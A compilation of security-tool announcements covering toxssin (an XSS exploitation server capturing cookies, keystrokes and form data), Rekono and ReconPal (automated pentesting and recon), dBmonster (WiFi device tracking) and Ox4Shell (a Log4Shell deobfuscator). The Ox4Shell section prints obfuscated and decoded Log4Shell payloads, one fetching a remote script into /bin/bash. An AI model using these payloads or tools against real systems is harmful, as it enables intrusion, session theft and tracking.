Brute Force

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/brute.py

Deserialization

Code:

https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/deserialization_socket.py

https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/deserialization_requests.py



Toxssin - An XSS Exploitation Command-Line Interface And Payload Generator


toxssin is an open-source penetration testing tool that automates the process of exploiting Cross-Site Scripting (XSS) vulnerabilities. It consists of an https server that works as an interpreter for the traffic generated by the malicious JavaScript payload that powers this tool (toxin.js).

This project started as (and still is) a research-based creative endeavor to explore the exploitability depth that an XSS vulnerability may introduce by using vanilla JavaScript, trusted certificates and cheap tricks.

Disclaimer: The project is quite fresh and has not been widely tested.

Video Presentation


Find screenshots here.

Capabilities

By default, toxssin intercepts:

  • cookies (if HttpOnly not present),
  • keystrokes,
  • paste events,
  • input change events,
  • file selections,
  • form submissions,
  • server responses,
  • table data (static as well as updates),

Most importantly, toxssin:

  • attempts to maintain XSS persistence while the user browses the website by intercepting http requests & responses and re-writing the document,
  • supports session management, meaning that, you can use it to exploit reflected as well as stored XSS,
  • supports custom JS script execution against sessions,
  • automatically logs every session.

Installation & Usage

git clone https://github.com/t3l3machus/toxssin
cd ./toxssin
pip3 install -r requirements.txt

To start toxssin.py, you will need to supply ssl certificate and private key files.

If you don't own a domain with a trusted certificate, you can issue and use self-signed certificates with the following command (although this won't take you far):

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365

It is strongly recommended to run toxssin with a trusted certificate (see How to get a Valid Certificate in this document). That said, you can start the toxssin server like this:

# python3 toxssin.py -u https://your.domain.com -c /your/certificate.pem -k /your/privkey.pem

Visit the project's wiki for additional information.

XSS Exploitation Obstacles

In my experience, there are 4 major obstacles when it comes to Cross-Site Scripting attacks attempting to include external JS scripts:

  1. the "Mixed Content" error, which can be resolved by serving the JavaScript payload via https (even with a self-signed certificate).
  2. the "NET::ERR_CERT_AUTHORITY_INVALID" error, which indicates that the server's certificate is untrusted / expired and can be bypassed by using a certificate issued by a trusted Authority.
  3. Cross-origin resource sharing (CORS), which is handled appropriately by the toxssin server.
  4. Content-Security-Policy header with the script-src set to specific domain(s) only will block scripts with cross-domain src from loading. Toxssin relies on the eval() function to deliver its poison, so, if the website has a CSP and the unsafe-eval source expression is not specified in the script-src directive, the attack will most likely fail (i'm working on a second poison delivery method to work around this).

Note: The "Mixed Content" error can of course occur when the target website is hosted via http and the JavaScript payload via https. This limits the scope of toxssin to https only webistes, as (by default) toxssin is started with ssl only.

How to get a Valid Certificate

First, you need to own a domain name. The fastest and most economic way to get one (in my knowledge) is via a cheap domain registrar service (e.g. https://www.namecheap.com/). Search for a random string domain name (e.g. "fvcm98duf") and check the less popular TLDs, like .xyz, as they will probably cost around 3$ per year.

After you purchase a domain name, you can use certbot (Let's Encrypt) to get a trusted certificate in 5 minutes or less:

  1. Append an A record to your Domain's DNS settings so that it points to your server ip,
  2. Follow certbots official instructions.

Tip: Don't install and run certbot on your own, you might get unexpected errors. Stick with the instructions.

Changelog

2022-06-19 - Added the exec prompt command (you can now execute custom JS scripts against a session).
2022-06-23 - I added two simple, dirty scripts as templates for testing the exec prompt command. I also fixed the cmd prompt's backward history access and made some improvements.

Future

The idea is to make it sharper, more reliable and expand its capabilities. Currently, i'm working on improving file captures.



Rekono - Execute Full Pentesting Processes Combining Multiple Hacking Tools Automatically


Rekono combines other hacking tools and its results to execute complete pentesting processes against a target in an automated way. The findings obtained during the executions will be sent to the user via email or Telegram notifications and also can be imported in Defect-Dojo if an advanced vulnerability management is needed. Moreover, Rekono includes a Telegram bot that can be used to perform executions easily from anywhere and using any device.


Features

  • Combine hacking tools to create pentesting processes
  • Execute pentesting processes
  • Execute pentesting tools
  • Review findings and receive them via email or Telegram notifications
  • Use Defect-Dojo integration to import the findings detected by Rekono
  • Execute tools and processes from Telegram Bot
  • Wordlists management

Why Rekono?

Do you ever think about the steps that you follow when start a pentesting? Probably you start performing some OSINT tasks to gather public information about the target. Then, maybe you run hosts discovery and ports enumeration tools. When you know what the target exposes, you can execute more specific tools for each service, to get more information and maybe, some vulnerabilities. And finally, if you find the needed information, you will look for a public exploit to get you into the target machine. I know, I know, this is an utopic scenario, and in the most cases the vulnerabilities are found due to the pentester skills and not by scanning tools. But before using your skills, how many time do you spend trying to get as information as possible with hacking tools? Pro bably, too much.

Why not automate this process and focus on find vulnerabilities using your skills and the information that Rekono sends you?

The Rekono name comes from the Esperanto language where it means recon.

Supported tools

Thanks to all the contributors of these amazing tools!

Installation

Docker

Execute the following commands in the root directory of the project:

docker-compose build
docker-compose up -d

If you need more than one tool running at the same time, you can set the number of executions-worker instances:

docker-compose up -d --scale executions-worker=5

Go to https://127.0.0.1/

You can check the details in the Docker documentation. Specially, the initial user documentation

Using Rekono CLI

If your system is Linux, you can use rekono-cli to install Rekono in your system:

pip3 install rekono-cli
rekono install

After that, you can manage the Rekono services using the following commands:

rekono services start
rekono services stop
rekono services restart

Go to http://127.0.0.1:3000/

⚠️ Only for Linux environments.

⚠️ Docker is advised. Only use that for local and personal usage.

From Source

Check the installation from source in Rekono Wiki

Configuration

Check the configuration options in Rekono Wiki

License

Rekono is licensed under the GNU GENERAL PUBLIC LICENSE Version 3

Support

If you need help you can create a new support Issue or mail rekono.project@gmail.com



ReconPal - Leveraging NLP For Infosec


Recon is one of the most important phases that seem easy but takes a lot of effort and skill to do right. One needs to know about the right tools, correct queries/syntax, run those queries, correlate the information, and sanitize the output. All of this might be easy for a seasoned infosec/recon professional to do, but for rest, it is still near to magic. How cool it will be to ask a simple question like "Find me an open Memcached server in Singapore with UDP support?" or "How many IP cameras in Singapore are using default credentials?" in a chat and get the answer?

The integration of GPT-3, deep learning-based language models to produce human-like text, with well-known recon tools like Shodan, is the foundation of ReconPal. ReconPal also supports using voice commands to execute popular exploits and perform reconnaissance.


Built With

  • OpenAI GPT-3
  • Shodan API
  • Speech-to-Text
  • Telegram Bot
  • Docker Containers
  • Python 3

Getting Started

To get ReconPal up and running, follow these simple steps.

Prerequisites

Installation

  1. Clone the repo

    git clone https://github.com/pentesteracademy/reconpal.git
  2. Enter your OPENAI, SHODAN API keys, and TELEGRAM bot token in docker-compose.yml

    OPENAI_API_KEY=<Your key>
    SHODAN_API_KEY=<Your key>
    TELEGRAM_BOT_TOKEN=<Your token>
  3. Start reconpal

    docker-compose up

Usage

Open the telegram app and select the created bot to use ReconPal.

  1. Click on start or just type in the input box.
/start
  1. Register the model.
/register
  1. Test the tool with some commands.
scan 10.0.0.8

Tool featured at

Contributors

Jeswin Mathai, Senior Security Researcher, INE jmathai@ine.com

Nishant Sharma, Security Research Manager, INE nsharma@ine.com

Shantanu Kale, Cloud Developer, INE skale@ine.com

Sherin Stephen, Cloud Developer, INE sstephen@ine.com

Sarthak Saini (Ex-Pentester Academy)

Documentation

For more details, refer to the "ReconPal.pdf" PDF file. This file contains the slide deck used for presentations.

Screenshots

Starting reconpal and registering model

Finder module in action

Scanner module in action

Attacker module in action

Voice Support

License

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License v2 as published by the Free Software Foundation.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see http://www.gnu.org/licenses/.



dBmonster - Track WiFi Devices With Their Recieved Signal Strength


With dBmonster you are able to scan for nearby WiFi devices and track them trough the signal strength (dBm) of their sent packets (sniffed with TShark). These dBm values will be plotted to a graph with matplotlib. It can help you to identify the exact location of nearby WiFi devices (use a directional WiFi antenna for the best results) or to find out how your self made antenna works the best (antenna radiation patterns).


Features on Linux and MacOS

Feature Linux MacOS
Listing WiFi interfaces
Track & scan on 2.4GHz
Track & scan on 5GHz
Scanning for AP
Scanning for STA
Beep when device found

Installation

git clone https://github.com/90N45-d3v/dBmonster
cd dBmonster

# Install required tools (On MacOS without sudo)
sudo python requirements.py

# Start dBmonster
sudo python dBmonster.py

Has been successfully tested on...

Platform
WiFi Adapter
Kali Linux ALFA AWUS036NHA, DIY Bi-Quad WiFi Antenna
MacOS Monterey Internal card 802.11 a/b/g/n/ac (MBP 2019)
* should work on any MacOS or Debian based system and with every WiFi card that supports monitor-mode

Troubleshooting for MacOS

Normally, you can only enable monitor-mode on the internal wifi card from MacOS with the airport utility from Apple. Somehow, wireshark (or here TShark) can enable it too on MacOS. Cool, but because of the MacOS system and Wireshark’s workaround, there are many issues running dBmonster on MacOS. After some time, it could freeze and/or you have to stop dBmonster/Tshark manually from the CLI with the ps command. If you want to run it anyway, here are some helpful tips:

Kill dBmonster, if you can't stop it over the GUI

Look if there are any processes, named dBmonster, tshark or python:

sudo ps -U root

Now kill them with the following command:

sudo kill <PID OF PROCESS>

Stop monitor-mode, if it's enabled after running dBmonster

sudo airport <WiFi INTERFACE NAME> sniff

Press control + c after a few seconds

* Please contact me on twitter, if you have anymore problems

Working on...

  • Capture signal strength data for offline graphs
  • Generate graphs from normal wireshark.pcapng file
  • Generate multiple graphs in one coordinate system

Additional information

  • If the tracked WiFi device is out of range or doesn't send any packets, the graph stops plotting till there is new data. So don't panic ;)
  • dBmonster wasn't tested on all systems... If there are any errors or something is going wrong, contact me.
  • If you used dBmonster on a non-listed Platform or WiFi Adapter, please open an issue (with Platform and WiFi Adapter information) and I will add your specification to the README.md


Ox4Shell - Deobfuscate Log4Shell Payloads With Ease


Deobfuscate Log4Shell payloads with ease.

Description

Since the release of the Log4Shell vulnerability (CVE-2021-44228), many tools were created to obfuscate Log4Shell payloads, making the lives of security engineers a nightmare.

This tool intends to unravel the true contents of obfuscated Log4Shell payloads.

For example, consider the following obfuscated payload:

${zrch-Q(NGyN-yLkV:-}${j${sm:Eq9QDZ8-xEv54:-ndi}${GLX-MZK13n78y:GW2pQ:-:l}${ckX:2@BH[)]Tmw:a(:-da}${W(d:KSR)ky3:bv78UX2R-5MV:-p:/}/1.${)U:W9y=N:-}${i9yX1[:Z[Ve2=IkT=Z-96:-1.1}${[W*W:w@q.tjyo@-vL7thi26dIeB-HxjP:-.1}:38${Mh:n341x.Xl2L-8rHEeTW*=-lTNkvo:-90/}${sx3-9GTRv:-Cal}c$c${HR-ewA.mQ:g6@jJ:-z}3z${uY)u:7S2)P4ihH:M_S8fanL@AeX-PrW:-]}${S5D4[:qXhUBruo-QMr$1Bd-.=BmV:-}${_wjS:BIY0s:-Y_}p${SBKv-d9$5:-}Wx${Im:ajtV:-}AoL${=6wx-_HRvJK:-P}W${cR.1-lt3$R6R]x7-LomGH90)gAZ:NmYJx:-}h}

After running Ox4Shell, it would transform into an intuitive and readable form:

${jndi:ldap://1.1.1.1:3890/Calc$cz3z]Y_pWxAoLPWh}

This tool also aids to identify and decode base64 commands For example, consider the following obfuscated payload:

${jndi:ldap://1.1.1.1:1389/Basic/Command/Base64/KHdnZXQgLU8gLSBodHRwOi8vMTg1LjI1MC4xNDguMTU3OjgwMDUvYWNjfHxjdXJsIC1vIC0gaHR0cDovLzE4NS4yNTAuMTQ4LjE1Nzo4MDA1L2FjYyl8L2Jpbi9iYXNoIA==}

After running Ox4Shell, the tool reveals the attacker’s intentions:

${jndi:ldap://1.1.1.1:1389/Basic/(wget -O - http://185.250.148.157:8005/acc||curl -o - http://185.250.148.157:8005/acc)|/bin/bash

We recommend running Ox4Shell with a provided file (-f) rather than an inline payload (-p), because certain shell environments will escape important characters, therefore will yield inaccurate results.

Usage

To run the tool simply:

~/Ox4Shell » python ox4shell.py --help
usage: ox4shell [-h] [-d] [-m MOCK] [--max-depth MAX_DEPTH] [--decode-base64] (-p PAYLOAD | -f FILE)

____ _ _ _____ _ _ _
/ __ \ | || | / ____| | | | |
| | | |_ _| || || (___ | |__ ___| | |
| | | \ \/ /__ _\___ \| '_ \ / _ \ | |
| |__| |> < | | ____) | | | | __/ | |
\____//_/\_\ |_||_____/|_| |_|\___|_|_|

Ox4Shell - Deobfuscate Log4Shell payloads with ease.
Created by https://oxeye.io

General:
-h, --help Show this help message and exit
-d, --debug Enable debug mode (default: False)
-m MOCK, --mock MOCK The location of the mock data JSON file that replaces certain values in the payload (default: mock.json)
--max-depth MAX_DEPTH
The ma ximum number of iteration to perform on a given payload (default: 150)
--decode-base64 Payloads containing base64 will be decoded (default: False)

Targets:
Choose which target payloads to run Ox4Shell on

-p PAYLOAD, --payload PAYLOAD
A single payload to deobfuscate, make sure to escape '$' signs (default: None)
-f FILE, --file FILE A file containing payloads delimited by newline (default: None)

Mock Data

The Log4j library has a few unique lookup functions, which allow users to look up environment variables, runtime information on the Java process, and so forth. This capability grants threat actors the ability to probe for specific information that can uniquely identify the compromised machine they targeted.

Ox4Shell uses the mock.json file to insert common values into certain lookup function, for example, if the payload contains the value ${env:HOME}, we can replace it with a custom mock value.

The default set of mock data provided is:

{
"hostname": "ip-127.0.0.1",
"env": {
"aws_profile": "staging",
"user": "ubuntu",
"pwd": "/opt/",
"path": "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/jvm/java-1.8-openjdk/jre/bin:/usr/lib/jvm/java-1.8-openjdk/bin"
},
"sys": {
"java.version": "16.0.2",
"user.name": "ubuntu"
},
"java": {
"version": "Java version 16.0.2",
"runtime": "OpenJDK Runtime Environment (build 1.8.0_181-b13) from Oracle Corporation",
"vm": "OpenJDK 64-Bit Server VM (build 25.181-b13, mixed mode)",
"os": "Linux 5.10.47-linuxkit unknown, architecture: amd64-64",
"locale": "default locale: en_US, platform encoding: UTF-8",
"hw": "processors: 1, architecture: amd64-64"
}
}

As an example, we can deobfuscate the following payload using the Ox4Shell's mocking capability:

~/Ox4Shell >> python ox4shell.py -p "\${jndi:ldap://\${sys:java.version}.\${env:AWS_PROFILE}.malicious.server/a}"  
${jndi:ldap://16.0.2.staging.malicious.server/a}

Authors

License

The source code for the project is licensed under the MIT license, which you can find in the LICENSE file.



❌